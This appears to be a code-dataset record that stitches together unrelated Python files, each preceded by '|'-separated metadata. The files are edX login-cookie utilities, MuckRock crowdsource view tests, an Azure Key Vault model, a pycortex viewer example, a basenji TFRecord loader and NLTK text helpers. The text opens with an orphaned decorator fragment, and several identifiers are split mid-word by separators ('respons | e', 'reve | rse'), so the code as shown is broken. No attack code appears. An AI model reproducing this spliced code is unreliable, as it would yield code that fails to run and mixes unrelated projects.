def transition(field, source='*', target=None, conditions=[]):
"""
Method decorator for mark allowed transitions
Set target to None if current |
edx-solutions/edx-platform | openedx/core/djangoapps/user_authn/cookies.py | Python | agpl-3.0 | 12,065 | 0.002404 | """
Utility functions for setting "logged in" cookies used by subdomains.
"""
import json
import logging
import time
import six
from django.conf import settings
from django.contrib.auth.models import User
from django.dispatch import Signal
from django.urls import NoReverseMatch, reverse
from django.utils.http import http_date
from edx_rest_framework_extensions.auth.jwt import cookies as jwt_cookies
from edx_rest_framework_extensions.auth.jwt.constants import JWT_DELIMITER
from oauth2_provider.models import Application
from openedx.core.djangoapps.oauth_dispatch.adapters import DOTAdapter
from openedx.core.djangoapps.oauth_dispatch.api import create_dot_access_token
from openedx.core.djangoapps.oauth_dispatch.jwt import create_jwt_from_token
from openedx.core.djangoapps.user_api.accounts.utils import retrieve_last_sitewide_block_completed
from openedx.core.djangoapps.user_authn.exceptions import AuthFailedError
from student.models import CourseEnrollment
log = logging.getLogger(__name__)
CREATE_LOGON_COOKIE = Signal(providing_args=['user', 'response'])
JWT_COOKIE_NAMES = (
# Header and payload sections of a JSON Web Token containing user
# information and used as an access token.
jwt_cookies.jwt_cookie_header_payload_name(),
# Signature section of a JSON Web Token.
jwt_cookies.jwt_cookie_signature_name(),
)
# TODO (ARCH-245): Remove the following deprecated cookies.
DEPRECATED_LOGGED_IN_COOKIE_NAMES = (
# Set to 'true' if the user is logged in.
settings.EDXMKTG_LOGGED_IN_COOKIE_NAME,
# JSON-encoded dictionary with user information.
settings.EDXMKTG_USER_INFO_COOKIE_NAME,
)
ALL_LOGGED_IN_COOKIE_NAMES = JWT_COOKIE_NAMES + DEPRECATED_LOGGED_IN_COOKIE_NAMES
def are_logged_in_cookies_set(request):
""" Check whether the request has logged in cookies set. """
if _are_jwt_cookies_disabled():
cookies_that_should_exist = DEPRECATED_LOGGED_IN_COOKIE_NAMES
else:
cookies_that_should_exist = ALL_LOGGED_IN_COOKIE_NAMES
return all(
cookie_name in request.COOKIES
for cookie_name in cookies_that_should_exist
) and request.COOKIES[settings.EDXMKTG_LOGGED_IN_COOKIE_NAME]
def delete_logged_in_cookies(response):
"""
Delete cookies indicating that the user is logged in.
Arguments:
response (HttpResponse): The response sent to the client.
Returns:
HttpResponse
"""
for cookie_name in ALL_LOGGED_IN_COOKIE_NAMES:
response.delete_cookie(
cookie_name,
path='/',
domain=settings.SESSION_COOKIE_DOMAIN
)
return response
def standard_cookie_settings(request):
""" Returns the common cookie settings (e.g. expiration time). """
cookie_settings = {
'domain': settings.SESSION_COOKIE_DOMAIN,
'path': '/',
'httponly': None,
}
_set_expires_in_cookie_settings(cookie_settings, request.session.get_expiry_age())
# In production, TLS should be enabled so that this cookie is encrypted
# when we send it. We also need to set "secure" to True so that the browser
# will transmit it only over secure connections.
#
# In non-production environments (acceptance tests, devstack, and sandboxes),
# we still want to set this cookie. However, we do NOT want to set it to "secure"
# because the browser won't send it back to us. This can cause an infinite redirect
# loop in the third-party auth flow, which calls `are_logged_in_cookies_set` to determine
# whether it needs to set the cookie or continue to the next pipeline stage.
cookie_settings['secure'] = request.is_secure()
return cookie_settings
def _set_expires_in_cookie_settings(cookie_settings, expires_in):
"""
Updates the max_age and expires fields of the given cookie_settings,
based on the value of expires_in.
"""
expires_time = time.time() + expires_in
expires = http_date(expires_time)
cookie_settings.update({
'max_age': expires_in,
'expires': expires,
})
def set_logged_in_cookies(request, response, user):
"""
Set cookies at the time of user login. See ALL_LOGGED_IN_COOKIE_NAMES to see
which cookies are set.
Arguments:
request (HttpRequest): The request to the view, used to calculate
the cookie's expiration date based on the session expiration date.
response (HttpResponse): The response on which the cookie will be set.
user (User): The currently logged in user.
Returns:
HttpResponse
"""
# Note: The user may not yet be set on the request object by this time,
# especially during third party authentication. So use the user object
# that is passed in when needed.
if user.is_authenticated and not user.is_anonymous:
# JWT cookies expire at the same time as other login-related cookies
# so that cookie-based login determination remains consistent.
cookie_settings = standard_cookie_settings(request)
_set_deprecated_logged_in_cookie(response, cookie_settings)
_set_deprecated_user_info_cookie(response, request, user, cookie_settings)
_create_and_set_jwt_cookies(response, request, cookie_settings, user=user)
CREATE_LOGON_COOKIE.send(sender=None, user=user, response=response)
return response
def refresh_jwt_cookies(request, response, user):
"""
Resets the JWT related cookies in the response for the given user.
"""
cookie_settings = standard_cookie_settings(request)
_create_and_set_jwt_cookies(response, request, cookie_settings, user=user)
return response
def _set_deprecated_user_info_cookie(response, request, user, cookie_settings):
"""
Sets the user info cookie on the response.
The user info cookie has the following format:
{
"version": 1,
"username": "test-user",
"header_urls": {
"account_settings": "https://example.com/account/settings",
"resume_block":
"https://example.com//courses/org.0/course_0/Run_0/jump_to/i4x://org.0/course_0/vertical/vertical_4"
"learner_profile": "https://example.com/u/test-user",
"logout": "https://example.com/logout"
}
}
"""
user_info = _get_user_info_cookie_data(request, user)
response.set_cookie(
settings.EDXMKTG_USER_INFO_COOKIE_NAME,
json.dumps(user_info),
**cookie_settings
)
def _set_deprecated_logged_in_cookie(response, cookie_settings):
""" Sets the logged in cookie on the response. """
# Backwards compatibility: set the cookie indicating that the user
# is logged in. This is just a boolean value, so it's not very useful.
# In the future, we should be able to replace this with the "user info"
# cookie set below.
response.set_cookie(
settings.EDXMKTG_LOGGED_IN_COOKIE_NAME,
'true',
**cookie_settings
)
return response
def _get_user_info_cookie_data(request, user):
""" Returns information that will populate the user info cookie. """
# Set a cookie with user info. This can be us | ed by external sites
# to customize content based on user information. Currently,
# we include information that's used to customize the "account"
# links in the header of subdomain sites (such as the marketing site).
header_urls = {'logout': reverse('logout')}
| # Unfortunately, this app is currently used by both the LMS and Studio login pages.
# If we're in Studio, we won't be able to reverse the account/profile URLs.
# To handle this, we don't add the URLs if we can't reverse them.
# External sites will need to have fallback mechanisms to handle this case
# (most likely just hiding the links).
try:
header_urls['account_settings'] = reverse('account_settings')
header_urls['learner_profile'] = reverse('learner_profile', kwargs={'username': user.username})
except NoReverseMatch:
pass
# Add 'resume course' last completed block
try:
header_urls['resume_block'] = retrieve_last_sitewide_block_completed(user)
exc |
erasche/galactic-radio-telescope | web/context_processors.py | Python | agpl-3.0 | 246 | 0.004065 | from django.conf import settings
cached_data = {
'URL_PREFIX': settings.URL_PREFIX,
'APP_VERSION': settings.GRT_VERSION,
'GIT_REVISION': settings.RAVEN_CONFIG.get( | 'release', None),
}
def url_prefix(requ | est):
return cached_data
|
MuckRock/muckrock | muckrock/crowdsource/tests/test_views.py | Python | agpl-3.0 | 9,147 | 0.00164 | """Tests for crowdsource views"""
# pylint: disable=invalid-name
# Django
from django.contrib.auth.models import AnonymousUser
from django.test import RequestFactory, TestCase
from django.urls import reverse
# Third Party
from nose.tools import assert_false, assert_true, eq_
# MuckRock
from muckrock.core.factories import ProjectFactory, UserFactory
from muckrock.core.test_utils import mock_middleware
from muckrock.crowdsource.factories import (
CrowdsourceFactory,
CrowdsourceResponseFactory,
)
from muckrock.crowdsource.views import CrowdsourceDetailView, CrowdsourceFormView
class TestCrowdsourceDetailView(TestCase):
"""Test who is allowed to see the crowdsource details"""
def setUp(self):
self.request_factory = RequestFactory()
self.view = CrowdsourceDetailView.as_view()
def test_anonymous_cannot_view(self):
"""Anonymous users cannot view a crowdsource's details"""
crowdsource = CrowdsourceFactory()
url = reverse(
"crowdsource-detail",
kwargs={"slug": crowdsource.slug, "idx": crowdsource.pk},
)
request = self.request_factory.get(url)
request = mock_middleware(request)
request.user = AnonymousUser()
response = self.view(request, slug=crowdsource.slug, idx=crowdsource.pk)
eq_(response.status_code, 302)
def test_authenticated_cannot_view(self):
"""Authenticated users cannot view a crowdsource's details"""
crowdsource = CrowdsourceFactory()
url = reverse(
"crowdsource-detail",
kwargs={"slug": crowdsource.slug, "idx": crowdsource.pk},
)
request = self.request_factory.get(url)
request = mock_middleware(request)
request.user = UserFactory()
respons | e = self.view(request, slug=crowdsource.slug, idx=crowdsource.pk)
eq_(response.status_code, 302)
def test_owner_can_view(self):
"""Owner can view a crowdsource's details"""
crowdsource = CrowdsourceFactory()
url = reve | rse(
"crowdsource-detail",
kwargs={"slug": crowdsource.slug, "idx": crowdsource.pk},
)
request = self.request_factory.get(url)
request = mock_middleware(request)
request.user = crowdsource.user
response = self.view(request, slug=crowdsource.slug, idx=crowdsource.pk)
eq_(response.status_code, 200)
def test_staff_can_view(self):
"""Staff can view a crowdsource's details"""
crowdsource = CrowdsourceFactory()
url = reverse(
"crowdsource-detail",
kwargs={"slug": crowdsource.slug, "idx": crowdsource.pk},
)
request = self.request_factory.get(url)
request = mock_middleware(request)
request.user = UserFactory(is_staff=True)
response = self.view(request, slug=crowdsource.slug, idx=crowdsource.pk)
eq_(response.status_code, 200)
def test_project_admin_can_view(self):
"""Project admin can view a crowdsource's details"""
project = ProjectFactory()
crowdsource = CrowdsourceFactory(project_admin=True, project=project)
url = reverse(
"crowdsource-detail",
kwargs={"slug": crowdsource.slug, "idx": crowdsource.pk},
)
request = self.request_factory.get(url)
request = mock_middleware(request)
request.user = UserFactory()
project.contributors.add(request.user)
response = self.view(request, slug=crowdsource.slug, idx=crowdsource.pk)
eq_(response.status_code, 200)
def test_project_non_admin_cannot_view(self):
"""Project contributor cannot view a crowdsource's details if project
admin option is not on
"""
project = ProjectFactory()
crowdsource = CrowdsourceFactory(project_admin=False, project=project)
url = reverse(
"crowdsource-detail",
kwargs={"slug": crowdsource.slug, "idx": crowdsource.pk},
)
request = self.request_factory.get(url)
request = mock_middleware(request)
request.user = UserFactory()
project.contributors.add(request.user)
response = self.view(request, slug=crowdsource.slug, idx=crowdsource.pk)
eq_(response.status_code, 302)
class TestCrowdsourceFormView(TestCase):
"""Test who is allowed to fill out assignment forms"""
def setUp(self):
self.request_factory = RequestFactory()
self.view = CrowdsourceFormView.as_view()
def test_public(self):
"""Anybody can fill out a public assignment"""
crowdsource = CrowdsourceFactory(status="open")
url = reverse(
"crowdsource-assignment",
kwargs={"slug": crowdsource.slug, "idx": crowdsource.pk},
)
request = self.request_factory.get(url)
request = mock_middleware(request)
request.user = AnonymousUser()
response = self.view(request, slug=crowdsource.slug, idx=crowdsource.pk)
eq_(response.status_code, 200)
def test_private(self):
"""Everybody cannot fill out a private assignment"""
project = ProjectFactory()
crowdsource = CrowdsourceFactory(
status="open", project_only=True, project=project
)
url = reverse(
"crowdsource-assignment",
kwargs={"slug": crowdsource.slug, "idx": crowdsource.pk},
)
request = self.request_factory.get(url)
request = mock_middleware(request)
request.user = AnonymousUser()
response = self.view(request, slug=crowdsource.slug, idx=crowdsource.pk)
eq_(response.status_code, 302)
def test_project(self):
"""Project members can fill out a private assignment"""
project = ProjectFactory()
crowdsource = CrowdsourceFactory(
status="open", project_only=True, project=project
)
url = reverse(
"crowdsource-assignment",
kwargs={"slug": crowdsource.slug, "idx": crowdsource.pk},
)
request = self.request_factory.get(url)
request = mock_middleware(request)
request.user = UserFactory()
project.contributors.add(request.user)
response = self.view(request, slug=crowdsource.slug, idx=crowdsource.pk)
eq_(response.status_code, 200)
def test_owner(self):
"""Crowdsource owner can fill out a private assignment"""
project = ProjectFactory()
crowdsource = CrowdsourceFactory(
status="open", project_only=True, project=project
)
url = reverse(
"crowdsource-assignment",
kwargs={"slug": crowdsource.slug, "idx": crowdsource.pk},
)
request = self.request_factory.get(url)
request = mock_middleware(request)
request.user = crowdsource.user
response = self.view(request, slug=crowdsource.slug, idx=crowdsource.pk)
eq_(response.status_code, 200)
def test_has_assignment_limit(self):
"""Test the has assignment method with a user limit"""
# pylint: disable=protected-access
view = CrowdsourceFormView()
crowdsource = CrowdsourceFactory(user_limit=True)
user = UserFactory()
ip_address = "127.0.0.1"
# the user hasn't replied yet, should have an assignment
assert_true(view._has_assignment(crowdsource, user, None))
# the user replied, they may not reply again
CrowdsourceResponseFactory(crowdsource=crowdsource, user=user)
assert_false(view._has_assignment(crowdsource, user, None))
# the ip address hasn't replied yet, should have an assignment
assert_true(view._has_assignment(crowdsource, AnonymousUser(), ip_address))
# the ip address replied, they may not reply again
CrowdsourceResponseFactory(
crowdsource=crowdsource, user=None, ip_address=ip_address
)
assert_false(view._has_assignment(crowdsource, AnonymousUser(), ip_address))
def test_has_assignment_no_limit(self):
"""Test the has assignment method without a user limit"""
|
SUSE/azure-sdk-for-python | azure-keyvault/azure/keyvault/models/issuer_parameters.py | Python | mit | 1,158 | 0 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Mi | crosoft (R) AutoRest Code Generator.
# Ch | anges may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class IssuerParameters(Model):
"""Parameters for the issuer of the X509 component of a certificate.
:param name: Name of the referenced issuer object or reserved names; for
example, 'Self' or 'Unknown'.
:type name: str
:param certificate_type: Type of certificate to be requested from the
issuer provider.
:type certificate_type: str
"""
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'certificate_type': {'key': 'cty', 'type': 'str'},
}
def __init__(self, name=None, certificate_type=None):
self.name = name
self.certificate_type = certificate_type
|
gallantlab/pycortex | examples/webgl/static.py | Python | bsd-2-clause | 675 | 0 | """
======================
Create a static viewer
======================
A static viewer is a brain viewer that exists permanently on a filesystem
The viewer is stored in a directory that stores html, javascript, data, etc
The viewer directory must be hosted by a server such as nginx
"""
import cortex
import numpy as np
np.random.seed(1234)
# gather data Volume
volum | e = cortex.Volume.random(subject='S1', xfmname='fullhead')
# select path for static viewer | on disk
viewer_path = '/path/to/store/viewer'
# create viewer
cortex.webgl.make_static(outpath=viewer_path, data=volume, recache=True)
# a webserver such as nginx can then be used to host the static viewer
|
calico/basenji | basenji/dataset.py | Python | apache-2.0 | 29,864 | 0.014633 | # Copyright 2017 Calico LLC
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# https://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =========================================================================
from __future__ import print_function
import glob
import json
import os
import pdb
import sys
from natsort import natsorted
import numpy as np
import tensorflow as tf
# TFRecord constants
TFR_INPUT = 'sequence'
TFR_OUTPUT = 'target'
def file_to_records(filename):
return tf.data.TFRecordDataset(filename, compression_type='ZLIB')
class SeqDataset:
def __init__(self, data_dir, split_label, batch_size, shuffle_buffer=128,
seq_length_crop=None, mode='eval', tfr_pattern=None):
"""Initialize basic parameters; run compute_stats; run make_dataset."""
self.data_dir = data_dir
self.split_label = split_label
self.batch_size = batch_size
self.shuffle_buffer = shuffle_buffer
self.seq_length_crop = seq_length_crop
self.mode = mode
self.tfr_pattern = tfr_pattern
# read data parameters
data_stats_file = '%s/statistics.json' % self.data_dir
with open(data_stats_file) as data_stats_open:
data_stats = json.load(data_stats_open)
self.seq_length = data_stats['seq_length']
self.seq_depth = data_stats.get('seq_depth',4)
self.target_length = data_stats['target_length']
self.num_targets = data_stats['num_targets']
if self.tfr_pattern is None:
self.tfr_path = '%s/tfrecords/%s-*.tfr' % (self.data_dir, self.split_label)
self.num_seqs = data_stats['%s_seqs' % self.split_label]
else:
self.tfr_path = '%s/tfrecords/%s' % (self.data_dir, self.tfr_pattern)
self.compute_stats()
self.make_dataset()
def batches_per_epoch(self):
return self.num_seqs // self.batch_size
def distribute(self, strategy):
self.dataset = strategy.experimental_distribute_dataset(self.dataset)
def generate_parser(self, raw=False):
def parse_proto(example_protos):
"""Parse TFRecord protobuf."""
# define features
features = {
TFR_INPUT: tf.io.FixedLenFeature([], tf.string),
TFR_OUTPUT: tf.io.FixedLenFeature([], tf.string)
}
# parse example into features
parsed_features = tf.io.parse_single_example(example_protos, features=features)
# decode sequence
sequence = tf.io.decode_raw(parsed_features[TFR_INPUT], tf.uint8)
if not raw:
sequence = tf.reshape(sequence, [self.seq_length, self.seq_depth])
if self.seq_length_crop is not None:
crop_len = (self.seq_length - self.seq_length_crop) // 2
sequence = sequence[crop_len:-crop_len,:]
sequence = tf.cast(sequence, tf.float32)
# decode targets
targets = tf.io.decode_raw(parsed_features[TFR_OUTPUT], tf.float16)
if not raw:
targets = tf.reshape(targets, [self.target_length, self.num_targets])
targets = tf.cast(targets, tf.float32)
return sequence, targets
return parse_proto
def make_dataset(self, cycle_length=4):
"""Make Dataset w/ transformations."""
# initialize dataset from TFRecords glob
tfr_files = natsorted(glob.glob(self.tfr_path))
if tfr_files:
# dataset = tf.data.Dataset.list_files(tf.constant(tfr_files), shuffle=False)
dataset = tf.data.Dataset.from_tensor_slices(tfr_files)
else:
print('Cannot order TFRecords %s' % self.tfr_path, file=sys.stderr)
dataset = tf.data.Dataset.list_files(self.tfr_path)
# train
if self.mode == 'train':
# repeat
dataset = dataset.repeat()
# interleave files
dataset = dataset.interleave(map_func=file_to_records,
cycle_length=cycle_length,
num_parallel_calls=tf.data.experimental.AUTOTUNE)
# shuffle
dataset = dataset.shuffle(buffer_size=self.shuffle_buffer,
reshuffle_each_iteration=True)
# valid/test
else:
# flat mix files
dataset = dataset.flat_map(file_to_records)
# (no longer necessary in tf2?)
# helper for training on single genomes in a multiple genome mode
# if self.num_seqs > 0:
# dataset = dataset.map(self.generate_parser())
dataset = dataset.map(self.generate_parser())
# cache (runs OOM)
# dataset = dataset.cache()
# batch
dataset = dataset.batch(self.batch_size)
# prefetch
dataset = dataset.prefetch(tf.data.experimental.AUTOTUNE)
# hold on
self.dataset = dataset
def compute_stats(self):
""" Iterate over the TFRecords to count sequences, and infer
seq_depth and num_targets."""
with tf.name_scope('stats'):
# read TF Records
dataset = tf.data.Dataset.list_files(self.tfr_path)
dataset = dataset.flat_map(file_to_records)
dataset = dataset.map(self.generate_parser(raw=True))
dataset = dataset.batch(1)
self.num_seqs = 0
if self.num_targets is not None:
targets_nonzero = np.zeros(self.num_targets, dtype='bool')
# for (seq_raw, genome), targets_raw in dataset:
for seq_raw, targets_raw in dataset:
# infer seq_depth
seq_1hot = seq_raw.numpy().reshape((self.seq_length,-1))
if self.seq_depth is None:
self.seq_depth = seq_1hot.shape[-1]
else:
assert(self.seq_depth == seq_1hot.shape[-1])
# infer num_targets
targets1 = targets_raw.numpy().reshape(self.target_length,-1)
if self.num_targets is None:
self.num_targets = targets1.shape[-1]
targets_nonzero = ((targets1 != 0).sum(axis=0) > 0) |
else:
assert(self.num_targets == targets1.shape[-1])
targets_nonzero = np.logical_or(targets_nonzero, (targets1 != 0).sum(axis=0) > 0)
# count sequences
self.num_seqs += 1
# warn user about nonzero targets
if self.num_seqs > 0:
self.num_targets_nonzero = (targets_nonzero > 0).sum()
print('%s has % | d sequences with %d/%d targets' % (self.tfr_path, self.num_seqs, self.num_targets_nonzero, self.num_targets), flush=True)
else:
self.num_targets_nonzero = None
print('%s has %d sequences with 0 targets' % (self.tfr_path, self.num_seqs), flush=True)
def numpy(self, return_inputs=True, return_outputs=True, step=1, dtype='float16'):
""" Convert TFR inputs and/or outputs to numpy arrays."""
with tf.name_scope('numpy'):
# initialize dataset from TFRecords glob
tfr_files = natsorted(glob.glob(self.tfr_path))
if tfr_files:
# dataset = tf.data.Dataset.list_files(tf.constant(tfr_files), shuffle=False)
dataset = tf.data.Dataset.from_tensor_slices(tfr_files)
else:
print('Cannot order TFRecords %s' % self.tfr_path, file=sys.stderr)
dataset = tf.data.Dataset.list_files(self.tfr_path)
# read TF Records
dataset = dataset.flat_map(file_to_records)
dataset = dataset.map(self.generate_parser(raw=True))
dataset = dataset.batch(1)
# initialize inputs and outputs
seqs_1hot = []
targets = []
# collect inputs and outputs
for seq_raw, targets_raw in dataset:
# sequence
if return_inputs:
seq_1hot = seq_raw.numpy().reshape((self.seq_length,-1))
if self.seq_length_crop is not None:
crop_len = (self.seq_length - self.seq_length_crop) // 2
seq_1hot = seq_1hot[crop_len:-crop_len,:]
seqs_1hot.append(seq_1hot)
# targets
if return_outputs:
targets1 = targets_raw.numpy().astype(dtype)
targets1 = np.reshape(targets1, (self.target_length,-1))
if step > 1:
step_i = np.arange(0, self.target_length, step)
targets1 = targets1[step_i,:]
targets.append(targets1)
# make arrays
seqs_1hot = np |
ryanmdavis/BioTechTopics | BTT_functions.py | Python | mit | 997 | 0.018054 | import string,nltk
from nltk.corpus import stopwords
from nltk.stem.porter impo | rt *
def tokenizeAndStemStrings(text):
# turn text to tokens
tokens = nltk.word_tokenize(text)
# remove stop words
tokens_no_sw = [word for word in tokens if not word in stopwords.words('english')]
# stem words
stem | med = []
stemmer = PorterStemmer()
for item in tokens_no_sw:
# this line converts strings to unicode, so here I do it explicitly
#try:
stemmed.append(stemmer.stem(item))
#except:
# stemmed.append(unicode(item)) # for example, stemmer can't stem aed because it expects a letter before a
# print("stemmer skipped word: " + str(unicode(item)))
return stemmed
def cleanString(x):
return x.translate(str.maketrans('','',string.punctuation)).replace('\n', ' ').replace('\r', ' ')
#return x.encode('ascii','ignore').translate(None, string.punctuation).replace('\n', ' ').replace('\r', ' ')
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.